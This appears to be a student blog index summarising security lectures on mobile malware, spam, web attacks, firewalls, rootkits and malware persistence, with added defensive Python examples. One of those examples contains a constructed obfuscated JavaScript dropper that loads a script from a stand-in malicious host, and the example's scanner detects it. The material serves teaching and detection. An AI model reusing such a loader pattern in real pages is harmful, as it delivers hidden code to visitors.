Posts

Weeks 9 & 10 - Mobile Security

These final weeks pivot from personal computers to mobile devices. It is worth noting how new the technology is despite its overwhelming presence in today's society.

source: lecture slides, Defense Against the Dark Arts, CS373, Oregon State University

There are a couple of ways to get around the system's security. On iOS, the device can be jailbroken to run applications that did not come through the App Store. On Android, the OS can be rooted, which gives the user (and any malware that reaches the device) root access to the system. Android security has been enhanced with every new version of the operating system. The following timeline is outdated, but it gives a nice overview of the beginning of mobile platforms.

source: lecture slides, Defense Against the Dark Arts, CS373, Oregon State University

Timeline of mobile malware:
YXES - the first mobile botnet, detected on Symbian in 2009; the malware spread via SMS
IKEE - the first iOS malware, detected in November 2009. It only targeted jailbroken iPhones, logging in over the SSH service that jailbreaking leaves enabled with its default root password
FakePlayer was the first Android ...

Week 8 - Messaging Security

This week we will be focusing on messaging security, or more specifically email security. Several terms will be defined and used this week.

Spam - unsolicited or illegitimate email, whether bulk advertising, phishing or otherwise intended to do harm
Ham - legitimate email
Spamtrap/honeypot - an email address or domain that is never used for legitimate mail and has no filtering on it, so that everything it receives is spam. The spam is then analyzed to study spam trends
Botnet - a collection of computers that have been hijacked to perform an action (such as sending spam) that the end user does not condone
Snowshoe spam - a spamming effort spread thinly across a broad footprint of IP addresses and domains, so that no single source sends enough volume to trip rate-based filters or blacklists
Phishing - a general spam message, aimed at a wide demographic, that tries to get information such as credentials out of the recipient
Spear Phishing - a targeted phishing attack against a specific person or demographic
Realtime Blackhole List (RBL) - a list of IP addresses known to send spam, published over DNS so that a mail server can look up each connecting sender
Heuristics - a spam detection technique that uses basic feature matches (strings, sender, etc.) to detect spam. If a message matches the phrase "buy <...
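To make the RBL and heuristic definitions concrete, here is a small scorer that combines both, written as an added example for these notes (it is not code from the lecture or from any real filter). The rule phrases, weights, the RBL networks, the brand table and the two sample messages are all constructed for the demonstration; a real RBL is queried over DNS rather than from an in-memory set.

```python
"""Toy heuristic spam scorer with a simulated Realtime Blackhole List.

Added example for these notes; it is not code from the CS373 lecture.
The rules, weights, RBL contents, brand table and the two sample
messages are all constructed for the demonstration.
"""
import ipaddress
import re

# Constructed RBL. A real RBL is served over DNS (the sender's IP,
# octets reversed, is looked up under the list's zone); this in-memory
# set of networks stands in for that query.
RBL = {
    ipaddress.ip_network("203.0.113.0/24"),   # TEST-NET-3, constructed entry
    ipaddress.ip_network("198.51.100.7/32"),  # TEST-NET-2, constructed entry
}

# Content heuristics: (rule name, weight, pattern tried on the lowercased text).
HEURISTICS = [
    ("buy_phrase", 2.0, re.compile(r"\bbuy (now|cheap)\b")),
    ("money_promise", 2.5, re.compile(r"\b(free money|you have won|lottery)\b")),
    ("urgent_action", 1.5, re.compile(r"\b(act now|verify your account|urgent)\b")),
    ("obfuscated_word", 1.5, re.compile(r"\bv[i1]agr[a4]\b")),
]
# Sender heuristic: the display name claims a brand whose real domain is known.
BRAND_DOMAINS = {"examplebank": "examplebank.test"}  # constructed
RBL_WEIGHT = 4.0
SENDER_WEIGHT = 2.0
THRESHOLD = 5.0  # a score at or above this is classified as spam

FROM_RE = re.compile(r'\s*"?([^"<]*?)"?\s*<([^>]+)>')


def rbl_listed(ip):
    """True if the connecting IP falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RBL)


def sender_mismatch(from_header):
    """True if the display name names a brand but the address domain is not that brand's."""
    m = FROM_RE.match(from_header)
    if not m:
        return False
    display = m.group(1).lower().replace(" ", "")
    domain = m.group(2).lower().rsplit("@", 1)[-1]
    return any(brand in display and domain != real
               for brand, real in BRAND_DOMAINS.items())


def score_message(msg):
    """Return (score, reasons) for a dict with src_ip, from, subject and body."""
    score, reasons = 0.0, []
    if rbl_listed(msg["src_ip"]):
        score += RBL_WEIGHT
        reasons.append("rbl")
    if sender_mismatch(msg["from"]):
        score += SENDER_WEIGHT
        reasons.append("sender_mismatch")
    text = (msg["subject"] + "\n" + msg["body"]).lower()
    for name, weight, pattern in HEURISTICS:
        if pattern.search(text):
            score += weight
            reasons.append(name)
    return score, reasons


def classify(msg):
    score, reasons = score_message(msg)
    return ("spam" if score >= THRESHOLD else "ham"), score, reasons


# Constructed sample messages.
SAMPLE_SPAM = {
    "src_ip": "203.0.113.45",
    "from": '"Example Bank Security" <alerts@mail-examp1ebank.test>',
    "subject": "Urgent: verify your account",
    "body": "Your account is locked. Verify your account now and buy cheap coverage today.",
}
SAMPLE_HAM = {
    "src_ip": "192.0.2.10",
    "from": '"Alice" <alice@examplebank.test>',
    "subject": "Lecture notes",
    "body": "Hi, attaching the notes from today's lecture on filtering.",
}

if __name__ == "__main__":
    for m in (SAMPLE_SPAM, SAMPLE_HAM):
        print(classify(m))
```

The weights are deliberately such that no single string match crosses the threshold: one "urgent" in an otherwise normal message scores 1.5 and stays ham, while a listed source IP plus a brand mismatch in the sender already reaches 6.0. That is the usual shape of heuristic filtering: cheap, individually weak signals that only become a verdict in combination.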

Week 7 - Web Security

According to the lecture, 95% of all malware (both enterprise and consumer) is delivered via the Internet. The way web-based malware is delivered has changed rapidly in a short amount of time. Originally phishing attacks worked primarily by redirecting the victim to fake websites. Over time phishing got more sophisticated and browser-specific attacks became more common. Currently a lot of attacks stay in the browser and never write to disk, because a file on disk is where anti-virus software would detect them. The image below shows a basic timeline of web-based malware.

source: lecture slides, Oregon State University CS373 Defense Against the Dark Arts

In terms of web attacks on Windows there are several points at which malicious content can be injected, and correspondingly several layers at which it can be inspected. From the top layer down:
De-obfuscated content (the final rendered content) - seen by the browser and its extensions
JavaScript - the script engine
HTML (DOM tree) - also the browser and its extensions
HTML (raw HTML) - WinInet and ETW/ETL
HTTP - the HTTP proxy...
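The reason the layers matter is that the same content looks different at each one. The following added example (not code from the lecture) scans a constructed landing page for a constructed indicator, first as raw HTML and then after folding the script's string tricks the way a script-layer inspector would. The folder only understands the three obfuscation idioms the sample uses (String.fromCharCode, literal concatenation and var x = "literal"); real droppers stack far more on top, which is exactly why inspection at the de-obfuscated layer exists.

```python
"""Why the inspection layer matters: the same page scanned as raw HTML and
after a small amount of JavaScript de-obfuscation.

Added example for these notes, not code from the CS373 lecture. The page,
the indicator and the three folding passes are constructed for the
demonstration; the folder only understands the string tricks the sample
uses (String.fromCharCode, "a" + "b" concatenation, var x = "literal").
"""
import re

# Constructed landing page: the drop URL never appears as a contiguous
# string in the raw HTML.
RAW_HTML = """<html><body><p>Loading...</p>
<script>
var a = "ht" + "tp://";
var b = String.fromCharCode(109, 97, 108, 119, 97, 114, 101);
var c = "." + "exa" + "mple/drop.js";
var s = document.createElement("script");
s.src = a + b + c;
document.body.appendChild(s);
</script>
</body></html>"""

# Constructed indicator: the host a proxy or AV signature would look for.
INDICATOR = re.compile(r"malware\.example")

STRING = r'"([^"\\]*)"'
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
CONCAT_RE = re.compile(STRING + r"\s*\+\s*" + STRING)
ASSIGN_RE = re.compile(r"var\s+([A-Za-z_$][\w$]*)\s*=\s*" + STRING + r"\s*;")


def extract_scripts(html):
    return "\n".join(re.findall(r"<script[^>]*>(.*?)</script>", html, re.S))


def fold_charcodes(js):
    """String.fromCharCode(104, 105) -> "hi"."""
    return CHARCODE_RE.sub(
        lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",")) + '"', js)


def fold_concat(js):
    """"ab" + "cd" -> "abcd", repeated until nothing changes."""
    while True:
        folded = CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
        if folded == js:
            return js
        js = folded


def inline_constants(js):
    """Replace uses of var x = "literal" with the literal and drop the declaration."""
    consts = dict(ASSIGN_RE.findall(js))
    js = ASSIGN_RE.sub("", js)
    for name, value in consts.items():
        js = re.sub(r"(?<![\w$.])" + re.escape(name) + r"(?![\w$])", '"' + value + '"', js)
    return js


def deobfuscate(js):
    return fold_concat(inline_constants(fold_concat(fold_charcodes(js))))


def scan_raw(html):
    """What a signature applied at the raw-HTML layer sees."""
    return bool(INDICATOR.search(html))


def scan_deobfuscated(html):
    """What the same signature sees once the script layer has been folded."""
    return bool(INDICATOR.search(deobfuscate(extract_scripts(html))))


def recovered_urls(html):
    return re.findall(r'"(https?://[^"]+)"', deobfuscate(extract_scripts(html)))


if __name__ == "__main__":
    print("raw layer:", scan_raw(RAW_HTML))
    print("de-obfuscated layer:", scan_deobfuscated(RAW_HTML), recovered_urls(RAW_HTML))
```

A signature on the raw bytes (what a proxy or a WinInet hook sees) misses the page; the identical signature matches once the script engine's view is reconstructed, and the drop URL falls out as a by-product. That is the trade the lecture's layer diagram captures: the lower layers see traffic earliest and cheapest, the upper layers see what the attacker actually meant.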

Week 6 - Network Security

Last week we were deep down in memory. This week we will start to work our way back up to a more familiar space, specifically network security. Why is network security important? First and foremost it keeps threats away from the host machines. It also protects against threats that originate inside the network and threats that arrive from outside it (think DDoS attacks). There are many different protection strategies for preventing network attacks.

Positive policy - also known as whitelisting. This is a list of the behaviors expected on the network; anything not on the list is denied by default. By knowing what is expected, unexpected behavior can be quickly identified.
Firewall - the device that enforces that list, deciding which traffic is expected and which is not.
The lecturer framed this in terms of an attack surface: the set of operations that the network is willing to respond to. A positive policy shrinks the attack surface to exactly the operations you meant to expose. Various zones of the network are created and identified (e.g. intranet, Int...
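The following added example (not code from the lecture) shows a positive policy in miniature: a short allow list between constructed zones, a default deny, and an audit over constructed flow-log lines that surfaces every flow the policy did not expect. The zone addresses, rules and log format are all assumptions made for the demonstration; the same shape applies to a real firewall's rule base and its denied-connection log.

```python
"""Positive-policy (whitelist) flow auditor.

Added example for these notes, not code from the CS373 lecture. The zone
layout, the allow list, the flow-log format and the sample flows are
constructed for the demonstration.
"""
import ipaddress
import re
from collections import namedtuple

# Zones, most specific first; any address not listed is treated as "internet".
ZONE_TABLE = [
    ("dmz", ipaddress.ip_network("192.0.2.0/24")),      # constructed
    ("intranet", ipaddress.ip_network("10.0.0.0/8")),    # constructed
]

# A rule names one expected behaviour: which zone may talk to which, on what.
Rule = namedtuple("Rule", "src_zone dst_zone proto dst_port")
POLICY = [
    Rule("internet", "dmz", "tcp", 443),       # public web tier
    Rule("intranet", "dmz", "tcp", 443),       # staff use the same web tier
    Rule("dmz", "intranet", "tcp", 5432),      # web tier to the database
    Rule("intranet", "internet", "tcp", 443),  # staff browsing
]
# Anything not matching a rule is unexpected and denied: that default is
# what makes the policy positive rather than a blacklist.

FLOW_RE = re.compile(r"^(\S+)\s+(\S+)\s*->\s*(\S+)\s+(tcp|udp)/(\d+)$")


def zone_of(ip):
    addr = ipaddress.ip_address(ip)
    for name, net in ZONE_TABLE:
        if addr in net:
            return name
    return "internet"


def parse_flow(line):
    """Parse a constructed flow-log line: '<ts> <src> -> <dst> <proto>/<port>'."""
    m = FLOW_RE.match(line.strip())
    if not m:
        raise ValueError("unparseable flow: %r" % line)
    ts, src, dst, proto, port = m.groups()
    return {"ts": ts, "src": src, "dst": dst, "proto": proto, "dst_port": int(port)}


def evaluate(flow):
    """Return ('allow', rule) for an expected flow, ('deny', None) otherwise."""
    key = (zone_of(flow["src"]), zone_of(flow["dst"]), flow["proto"], flow["dst_port"])
    for rule in POLICY:
        if tuple(rule) == key:
            return "allow", rule
    return "deny", None


def audit(lines):
    return [(line, *evaluate(parse_flow(line))) for line in lines]


def unexpected(lines):
    """The flows a positive policy surfaces for investigation."""
    return [line for line, verdict, _ in audit(lines) if verdict == "deny"]


def attack_surface(zone, from_zone=None):
    """The (proto, port) operations a zone is willing to respond to."""
    return {(r.proto, r.dst_port) for r in POLICY
            if r.dst_zone == zone and (from_zone is None or r.src_zone == from_zone)}


# Constructed flow records.
SAMPLE_FLOWS = [
    "2024-05-01T10:00:00Z 198.51.100.23 -> 192.0.2.10 tcp/443",
    "2024-05-01T10:00:05Z 198.51.100.23 -> 192.0.2.10 tcp/22",   # SSH from outside
    "2024-05-01T10:00:09Z 192.0.2.10 -> 10.1.2.3 tcp/5432",
    "2024-05-01T10:00:12Z 192.0.2.10 -> 10.1.2.3 tcp/445",       # DMZ host reaching SMB inside
    "2024-05-01T10:00:20Z 10.1.2.3 -> 203.0.113.9 tcp/443",
    "2024-05-01T10:00:25Z 10.1.2.3 -> 203.0.113.9 udp/53",       # direct outbound DNS
]

if __name__ == "__main__":
    for line, verdict, rule in audit(SAMPLE_FLOWS):
        print(verdict.upper(), line, "" if rule is None else "(%s)" % (rule,))
```

Three of the six flows are denied, and each denial is a question worth asking: why is something on the Internet trying SSH into the DMZ, why is a DMZ web host reaching for SMB on the intranet, and why is a workstation resolving DNS directly on the Internet instead of through the internal resolver. The attack_surface helper answers the lecturer's question literally: the DMZ, as seen from anywhere, responds only to TCP 443.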

Week 5 - Windows Internals

This week we will be primarily focusing on rootkits. A rootkit is a piece of malware that conceals its activities and existence from the user. This new era of malware came into focus in 2005, when Sony BMG shipped music CDs with copy-protection software that hid any file whose name started with $sys$ from the user. Attackers saw the potential of this: malware that named its own files with the $sys$ prefix was hidden by Sony's driver, and the same cloaking technique was soon adopted by malware authors themselves. The majority of rootkits operate in a 32-bit Windows environment, though some target 64-bit systems, where kernel-mode code signing and PatchGuard make a kernel rootkit harder to install. Most rootkits operate at the kernel level because at that level they have full access to and control of the system. The slide below is a nice illustration of what the computer architecture looks like and where rootkits sit.

slide source from lecture, OSU CS 373

Definitions for this week:
thread - the smallest unit of execution within an operating system. The slide below has a nice demonstration of how a thread is executed
hooking - redirecting...

Week 4 - Software Vulnerabilities and Common Exploits

There are two main components to hacking: finding "bugs" in software that let a user interact with a program in an unintended way, and configuration vulnerabilities (an example of a configuration vulnerability is a weak password). Hacking used to focus primarily on a company's perimeter systems (the parts of the system exposed to the internet), but as defenses against those attacks have improved, hackers now target the internal systems, typically by going through the system's users. Memory corruption is a key area that attackers examine when trying to gain access to a system. The definition used by the lecturer this week is: "Accessing (reading/writing) memory (stack/heap) in an invalid (originally unintended) way which results in an undefined behavior (what we are looking to control)." There are four common categories of memory corruption: lifetime control (e.g. use-after-free and double free), uninitialized memory, array index calculations, and buffer length calculations. A stan...

Week 3 - Malware Defenses

Attack vector graph sourced from lecture slides provided by Oregon State University CS373

There are four key things that malware does: make first contact, execute code, establish presence, and perform malicious activity.

First contact: can come in many different ways, including email attachments, a spoofed ad network (also known as malvertising), instant messaging, poisoned search results, a watering hole (the term for poisoning a website that the targets routinely visit), and physical contact such as a USB stick.
Execute: there are three main methods of execution: social engineering, exploitation, and code that runs as a feature rather than through a bug (for example document macros or scripting the platform legitimately allows).
Establish presence: the malware may try to blend in by using filenames very similar to operating system file names. It can also alter file creation and modification timestamps so that it does not stand out as newly arrived. Malware can also hide using rootkit or bootkit techniques. Once established, a piece of malware also has to persist across reboots. The easiest ...
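The "blend in" tricks under Establish presence each leave a signal a responder can check for. The following added example (not code from the lecture) runs three such checks over a constructed file inventory: a near-miss against well-known system binary names after undoing digit-for-letter substitutions, a genuine system file name sitting outside its expected directory, and a modification time earlier than the creation time. The table of known binaries, their expected directories and the inventory entries are all assumptions made for the demonstration.

```python
"""Triage checks for malware trying to blend in: lookalike system file
names, system file names in unexpected directories, and timestamps that
were tampered with.

Added example for these notes, not code from the CS373 lecture. The list
of known system files, their expected directories and the file inventory
are constructed for the demonstration.
"""
import ntpath
from datetime import datetime

# Constructed table of well-known Windows binaries and where they belong.
KNOWN_SYSTEM_FILES = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}
# Digits commonly substituted for letters in lookalike names (svch0st, 1sass).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def edit_distance(a, b):
    """Levenshtein distance, iterative single-row version."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_name(path):
    """Return 'unexpected_location', 'lookalike' or None for one path."""
    name = ntpath.basename(path).lower()
    directory = ntpath.dirname(path).lower()
    if name in KNOWN_SYSTEM_FILES:
        return None if directory == KNOWN_SYSTEM_FILES[name] else "unexpected_location"
    normalized = name.translate(HOMOGLYPHS)
    if any(edit_distance(normalized, known) <= 1 for known in KNOWN_SYSTEM_FILES):
        return "lookalike"
    return None


def check_times(created, modified):
    """A modification time earlier than the creation time is a timestomping
    signal. Copied files show the same pattern legitimately, so treat it as
    a triage lead rather than proof."""
    return "timestomp" if modified < created else None


def triage(inventory):
    """inventory: list of dicts with path, created, modified (ISO 8601 strings)."""
    findings = []
    for entry in inventory:
        created = datetime.fromisoformat(entry["created"])
        modified = datetime.fromisoformat(entry["modified"])
        for reason in (check_name(entry["path"]), check_times(created, modified)):
            if reason:
                findings.append((entry["path"], reason))
    return findings


# Constructed file inventory, as a triage script might collect it.
INVENTORY = [
    {"path": r"C:\Windows\System32\svchost.exe", "created": "2023-02-01T09:00:00", "modified": "2023-02-01T09:00:00"},
    {"path": r"C:\Users\Public\svch0st.exe", "created": "2024-05-02T10:00:00", "modified": "2024-05-02T10:00:00"},
    {"path": r"C:\Users\Public\svchost.exe", "created": "2024-05-02T10:01:00", "modified": "2024-05-02T10:01:00"},
    {"path": r"C:\ProgramData\lsasss.exe", "created": "2024-05-02T10:02:00", "modified": "2024-05-02T10:02:00"},
    {"path": r"C:\Windows\Temp\update.exe", "created": "2024-05-02T10:03:00", "modified": "2019-01-01T00:00:00"},
    {"path": r"C:\Program Files\Vendor\app.exe", "created": "2023-06-01T12:00:00", "modified": "2023-07-01T12:00:00"},
]

if __name__ == "__main__":
    for path, reason in triage(INVENTORY):
        print(reason, path)
```

Four of the six entries come back flagged and the two legitimate ones do not. None of these checks proves infection on its own; their value is that each one targets a specific blending-in step from the lecture, so a hit tells you which trick was used and where to look next.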